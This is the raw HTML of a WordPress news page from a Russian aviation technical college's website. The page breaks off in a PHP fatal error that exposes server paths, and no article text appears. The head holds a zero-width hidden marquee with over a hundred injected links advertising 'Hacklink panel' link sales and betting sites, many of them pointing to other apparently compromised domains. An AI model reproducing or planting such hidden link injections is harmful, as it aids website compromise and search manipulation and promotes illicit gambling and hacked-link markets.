\u0440\u0435\u0436\u0438\u043c","settings_title":"\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0448\u0440\u0438\u0444\u0442\u0430","setfont_title":"\u0412\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0448\u0440\u0438\u0444\u0442","setsplet":"\u0418\u043d\u0442\u0435\u0440\u0432\u0430\u043b \u043c\u0435\u0436\u0434\u0443 \u0431\u0443\u043a\u0432\u0430\u043c\u0438","setspline":"\u0418\u043d\u0442\u0435\u0440\u0432\u0430\u043b \u043c\u0435\u0436\u0434\u0443 \u0441\u0442\u0440\u043e\u043a\u0430\u043c\u0438","standart":"\u0421\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439","average":"\u0421\u0440\u0435\u0434\u043d\u0438\u0439","big":"\u0411\u043e\u043b\u044c\u0448\u043e\u0439","sel_sxem":"\u0412\u044b\u0431\u043e\u0440 \u0446\u0432\u0435\u0442\u043e\u0432\u043e\u0439 \u0441\u0445\u0435\u043c\u044b","closepanel":"\u0417\u0430\u043a\u0440\u044b\u0442\u044c \u043f\u0430\u043d\u0435\u043b\u044c","defsetpanel":"\u0412\u0435\u0440\u043d\u0443\u0442\u044c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438","noimgdescr":"\u043d\u0435\u0442 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u043a \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044e","picture":"\u0418\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.avia-college-uu.ru/wp-content/plugins/for-the-visually-impaired/js/js.for.the.visually.impaired.js?ver=0.53' id='add_vi_script-js'></script> <script type='text/javascript' id='ai-js-js-extra'> /* <![CDATA[ */ var MyAjax = {"ajaxurl":"https:\/\/www.avia-college-uu.ru\/wp-admin\/admin-ajax.php","security":"cc43a1da42"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.avia-college-uu.ru/wp-content/plugins/advanced-iframe/js/ai.js?ver=191909' id='ai-js-js'></script> <link rel="https://api.w.org/" href="https://www.avia-college-uu.ru/wp-json/" /><link rel="alternate" type="application/json" href="https://www.avia-college-uu.ru/wp-json/wp/v2/posts/14161" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.avia-college-uu.ru/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.avia-college-uu.ru/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 6.1.1" /> <link rel="canonical" href="https://www.avia-college-uu.ru/news/14161/" /> <link rel='shortlink' href='https://www.avia-college-uu.ru/?p=14161' /> <link rel="alternate" type="application/json+oembed" href="https://www.avia-college-uu.ru/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.avia-college-uu.ru%2Fnews%2F14161%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.avia-college-uu.ru/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.avia-college-uu.ru%2Fnews%2F14161%2F&format=xml" /> <style data-context="foundation-flickity-css">/*! Flickity v2.0.2 http://flickity.metafizzy.co ---------------------------------------------- */.flickity-enabled{position:relative}.flickity-enabled:focus{outline:0}.flickity-viewport{overflow:hidden;position:relative;height:100%}.flickity-slider{position:absolute;width:100%;height:100%}.flickity-enabled.is-draggable{-webkit-tap-highlight-color:transparent;tap-highlight-color:transparent;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.flickity-enabled.is-draggable .flickity-viewport{cursor:move;cursor:-webkit-grab;cursor:grab}.flickity-enabled.is-draggable .flickity-viewport.is-pointer-down{cursor:-webkit-grabbing;cursor:grabbing}.flickity-prev-next-button{position:absolute;top:50%;width:44px;height:44px;border:none;border-radius:50%;background:#fff;background:hsla(0,0%,100%,.75);cursor:pointer;-webkit-transform:translateY(-50%);transform:translateY(-50%)}.flickity-prev-next-button:hover{background:#fff}.flickity-prev-next-button:focus{outline:0;box-shadow:0 0 0 5px #09f}.flickity-prev-next-button:active{opacity:.6}.flickity-prev-next-button.previous{left:10px}.flickity-prev-next-button.next{right:10px}.flickity-rtl .flickity-prev-next-button.previous{left:auto;right:10px}.flickity-rtl .flickity-prev-next-button.next{right:auto;left:10px}.flickity-prev-next-button:disabled{opacity:.3;cursor:auto}.flickity-prev-next-button svg{position:absolute;left:20%;top:20%;width:60%;height:60%}.flickity-prev-next-button .arrow{fill:#333}.flickity-page-dots{position:absolute;width:100%;bottom:-25px;padding:0;margin:0;list-style:none;text-align:center;line-height:1}.flickity-rtl .flickity-page-dots{direction:rtl}.flickity-page-dots .dot{display:inline-block;width:10px;height:10px;margin:0 8px;background:#333;border-radius:50%;opacity:.25;cursor:pointer}.flickity-page-dots .dot.is-selected{opacity:1}</style><style data-context="foundation-slideout-css">.slideout-menu{position:fixed;left:0;top:0;bottom:0;right:auto;z-index:0;width:256px;overflow-y:auto;-webkit-overflow-scrolling:touch;display:none}.slideout-menu.pushit-right{left:auto;right:0}.slideout-panel{position:relative;z-index:1;will-change:transform}.slideout-open,.slideout-open .slideout-panel,.slideout-open body{overflow:hidden}.slideout-open .slideout-menu{display:block}.pushit{display:none}</style><link rel="amphtml" href="https://www.avia-college-uu.ru/news/14161/amp/"><link rel="icon" href="https://www.avia-college-uu.ru/wp-content/uploads/2022/11/cropped-на-сайт-1-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.avia-college-uu.ru/wp-content/uploads/2022/11/cropped-на-сайт-1-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://www.avia-college-uu.ru/wp-content/uploads/2022/11/cropped-на-сайт-1-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.avia-college-uu.ru/wp-content/uploads/2022/11/cropped-на-сайт-1-270x270.png" /> <style>.ios7.web-app-mode.has-fixed header{ background-color: rgba(153,1,1,.88);}</style> <style type="text/css" id="wp-custom-css"> .page-id-1827 .certificate-form-wrapper { max-width: 600px; margin: 40px auto; padding: 30px; background: #ffffff; border-radius: 12px; box-shadow: 0 10px 25px rgba(0,0,0,0.1); } .page-id-123 .form-group { margin-bottom: 20px; } .page-id-123 .form-group input, .page-id-123 .form-group select { width: 100%; padding: 12px; border: 1px solid #ccc; border-radius: 8px; } .page-id-123 .certificate-form button { width: 100%; padding: 14px; background: #2563eb; color: white; border-radius: 8px; } </style> <!-- Telegram: https://t.me/hacklink_panel --> <marquee style='position: absolute; width: 0px;'> <p><a href="https://x.com/_Marsbahis_xTR" title="marsbahis giriş">marsbahis giriş</a></p><p><a href="https://x.com/Marsbahistelegr" title="marsbahis giriş telegram">marsbahis giriş telegram</a></p><p><a href="https://agoraug.org/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://analisasahamku.com/" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://ap.udec.cl/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://ateliertrottinette.ch/" title="Hacklink">Hacklink</a></p><p><a href="https://backlinkhacklink.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://backlinkpaketlerisatinal.com/" title="Backlink paketleri">Backlink paketleri</a></p><p><a href="https://bohegeha.com/" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://calidad.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://cedo.org/" title="Hacklink">Hacklink</a></p><p><a href="https://dacc.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://divinodc.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://docencia.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://e-marubouro.com/" title="Hacklink">Hacklink</a></p><p><a href="https://economica.md/" title="Hacklink">Hacklink</a></p><p><a href="https://editorial.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://eniyihacklink.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://erosmactv.com/" title="Eros Maç Tv">Eros Maç Tv</a></p><p><a href="https://gearbox.udec.cl/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://geografia.udec.cl/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://gobiernoabierto.udec.cl/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://guncelhacklink.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://guvenilirhacklink.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklink.blog/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklink.cam/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklink.help/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklink.org.uk/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkajansi.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkbal.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkcakar.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkforumu.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkgirisyap.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkjackson.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkmagazasi.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkmarket.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkmarket.com/" title="Hacklink satın al">Hacklink satın al</a></p><p><a href="https://hacklinkmarketing.com/" title="Hacklink satın al">Hacklink satın al</a></p><p><a href="https://hacklinkmerkezi.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkmichael.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinknedur.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinknetworku.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinknoid.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkoku.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkpaketleri.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkpanelgir.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkpanelin.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkpanelis.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkpanelsatis.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkpc.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinksamuray.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinksezar.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkspanels.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinktime.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkuzmani.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkvar.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkvoid.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://hacklinkyaz.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://htg.ub.gov.mn/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://illuminatiq.com/" title="Illuminati">Illuminati</a></p><p><a href="https://indiaviewpoint.com/" title="Hacklink">Hacklink</a></p><p><a href="https://interdisciplina.udec.cl/" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://ists.ac.cd/" title="Hacklink">Hacklink</a></p><p><a href="https://iwander.lovestoblog.com/" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://lcs.tractalis.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://lightroom.adobe.com/u/hacklinkpanel" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://losangeles.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://masalokuyorum.com" title="Masal oku">Masal oku</a></p><p><a href="https://mesin.polsub.ac.id/" title="Hacklink">Hacklink</a></p><p><a href="https://migne.biz/" title="Hacklink">Hacklink</a></p><p><a href="https://milliongloballeads.com/" title="Hacklink">Hacklink</a></p><p><a href="https://minhacienda-gob.com/" title="Hacklink">Hacklink</a></p><p><a href="https://online-biz-articles.com/" title="Hacklink">Hacklink</a></p><p><a href="https://opusbeverlyhills.com/" title="Hacklink">Hacklink</a></p><p><a href="https://p3m.polsub.ac.id/" title="Hacklink">Hacklink</a></p><p><a href="https://paintball-doberman.ru/" title="anadoluslot">anadoluslot</a></p><p><a href="https://peakfab.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://play.google.com/store/apps/details?id=com.followpeek.pro&hl=tr" title="Postegro">Postegro</a></p><p><a href="https://pmb.polsub.ac.id/" title="Masal Oku">Masal Oku</a></p><p><a href="https://pulptechmalta.com/" title="Hacklink">Hacklink</a></p><p><a href="https://sceneworld.net/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://seohacklinkpanel.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://seohacklinks.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://shabonehacklink.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://sites.google.com/view/panel-hacklink-satin-al/" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://spinalnetwork.org.au/" title="Hacklink">Hacklink</a></p><p><a href="https://suelos.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://t.me/hacklink_panel" title="Hacklink">Hacklink</a></p><p><a href="https://talentos.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://tattootalk.net/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://thefrisky.de/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://tr.backlinkpaketal.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://tr.backlinksatinalpaket.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://transparencia.udec.cl/" title="Hacklink">Hacklink</a></p><p><a href="https://troposlab.com/" title="Hacklink">Hacklink</a></p><p><a href="https://unioncars.co/" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://usakin.ac.cd/" title="Hacklink">Hacklink</a></p><p><a href="https://www.antasonlus.org/" title="Hacklink">Hacklink</a></p><p><a href="https://www.billboardmusicworld.com/" title="Hacklink">Hacklink</a></p><p><a href="https://www.buyhacklinks.com/" title="Buy Hacklink">Buy Hacklink</a></p><p><a href="https://www.buyhacklinks.com/" title="Hacklink">Hacklink</a></p><p><a href="https://www.ccp.gob.bo/" title="Hacklink">Hacklink</a></p><p><a href="https://www.depersonaapersona.es/" title="Hacklink">Hacklink</a></p><p><a href="https://www.facebook.com/hacklink.official/" title="Hacklink">Hacklink</a></p><p><a href="https://www.hacklink.com.tr/" title="Hacklink satın al">Hacklink satın al</a></p><p><a href="https://www.hacklink.pro/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkapollo.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkask.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkbasan.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkbura.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkc.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkcan.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkcia.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkdown.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkgiris.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkguzel.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinki.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkjack.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinklabs.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkmarket.com.tr/" title="Hacklink">Hacklink</a></p><p><a href="https://www.hacklinkmaster.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinknasil.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkon.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkpanelal.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkseo.vip/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinksevgi.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkturko.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkumut.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkvurdur.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkzebur.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.hacklinkzirve.com/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.lagarciared.ar/" title="Hacklink">Hacklink</a></p><p><a href="https://www.masaloku.help/" title="Masal Oku">Masal Oku</a></p><p><a href="https://www.moliselavoro.it/" title="Hacklink panel">Hacklink panel</a></p><p><a href="https://www.ngutechnology.com.au/" title="Hacklink">Hacklink</a></p><p><a href="https://www.pcplanetnow.com/" title="Hacklink">Hacklink</a></p><p><a href="https://www.polishculture-nyc.org/" title="หวยออนไลน์">หวยออนไลน์</a></p><p><a href="https://www.uniples.com/" title="Hacklink">Hacklink</a></p><p><a href="https://www.youtube.com/@hacklinksatinal" title="Hacklink satın al">Hacklink satın al</a></p><p><a href="https://x.com/hacklinkpanel" title="Hacklink Panel">Hacklink Panel</a></p><p><a href="https://www.symbaloo.com/mix/agariounblockedschool?lang=EN" title="unblocked games">unblocked games</a></p><p><a href="https://www.symbaloo.com/mix/unblocked-games-76?lang=EN" title="unblocked games 76">unblocked games 76</a></p><p><a href="https://x.com/MeritKingiris_x" title="meritking giriş twitter">meritking giriş twitter</a></p> </marquee> </head> <body class="post-template-default single single-post postid-14161 single-format-standard wp-custom-logo mt-14161 mt-post-%d0%b4%d0%b8%d0%ba%d1%82%d0%b0%d0%bd%d1%82-%d0%bf%d0%be%d0%b1%d0%b5%d0%b4%d1%8b-%d0%b7%d0%bd%d0%b0%d1%82%d1%8c-%d1%87%d1%82%d0%be%d0%b1%d1%8b-%d0%bf%d0%be%d0%bc%d0%bd%d0%b8%d1%82%d1%8c" > <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"> Перейти к содержимому</a> <div class="wrapper" id="custom-background-css"> <header class="mg-headwidget"> <!--==================== TOP BAR ====================--> <div class="clearfix"></div> <div class="mg-nav-widget-area-back" style='background-image: url("https://www.avia-college-uu.ru/wp-content/uploads/2023/03/Год-наставника_заставка.jpg" );'> <div class="overlay"> <div class="inner" style="background-color:rgba(32,47,91,0.4);" > <div class="container-fluid"> <div class="mg-nav-widget-area"> <div class="row align-items-center"> <div class="col-md-3 col-sm-4 text-center-xs"> <div class="navbar-header"> <a href="https://www.avia-college-uu.ru/" class="custom-logo-link" rel="home"><img width="137" height="137" src="https://www.avia-college-uu.ru/wp-content/uploads/2022/11/cropped-на-сайт-1-1.png" class="custom-logo" alt="Улан-Удэнский Авиационный техникум" decoding="async" /></a> <div class="site-branding-text"> <h1 class="site-title"> <a href="https://www.avia-college-uu.ru/" rel="home">Улан-Удэнский Авиационный техникум</a></h1> <p class="site-description">Государственное бюджетное профессиональное образовательное учреждение</p> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="mg-menu-full"> <nav class="navbar navbar-expand-lg navbar-wp"> <div class="container-fluid flex-row-reverse"> <!-- Right nav --> <div class="m-header d-flex pl-3 ml-auto my-2 my-lg-0 position-relative align-items-center"> <a class="mobilehomebtn" href="https://www.avia-college-uu.ru"><span class="fa fa-home"></span></a> <!-- navbar-toggle --> <button class="navbar-toggler mx-auto" type="button" data-toggle="collapse" data-target="#navbar-wp" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <i class="fa fa-bars"></i> </button> <!-- /navbar-toggle --> <div class="dropdown show mg-search-box pr-2"> <a class="dropdown-toggle msearch ml-auto" href="#" role="button" id="dropdownMenuLink" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="fa fa-search"></i> </a> <div class="dropdown-menu searchinner" aria-labelledby="dropdownMenuLink"> <form role="search" method="get" id="searchform" action="https://www.avia-college-uu.ru/"> <div class="input-group"> <input type="search" class="form-control" placeholder="Поиск" value="" name="s" /> <span class="input-group-btn btn-default"> <button type="submit" class="btn"> <i class="fa fa-search"></i> </button> </span> </div> </form> </div> </div> </div> <!-- /Right nav --> <div class="collapse navbar-collapse" id="navbar-wp"> <div class="d-md-block"> <br /> <b>Fatal error</b>: Uncaught Error: Class 'newsup_nav_walker' not found in /home/fr2992/public_html/wp-content/themes/newsup/header.php:93 Stack trace: #0 /home/fr2992/public_html/wp-includes/template.php(783): require_once() #1 /home/fr2992/public_html/wp-includes/template.php(718): load_template('/home/fr2992/pu...', true, Array) #2 /home/fr2992/public_html/wp-includes/general-template.php(48): locate_template(Array, true, true, Array) #3 /home/fr2992/public_html/wp-content/themes/newsup/single.php(4): get_header() #4 /home/fr2992/public_html/wp-includes/template-loader.php(106): include('/home/fr2992/pu...') #5 /home/fr2992/public_html/wp-blog-header.php(19): require_once('/home/fr2992/pu...') #6 /home/fr2992/public_html/index.php(17): require('/home/fr2992/pu...') #7 {main} thrown in <b>/home/fr2992/public_html/wp-content/themes/newsup/header.php</b> on line <b>93</b><br />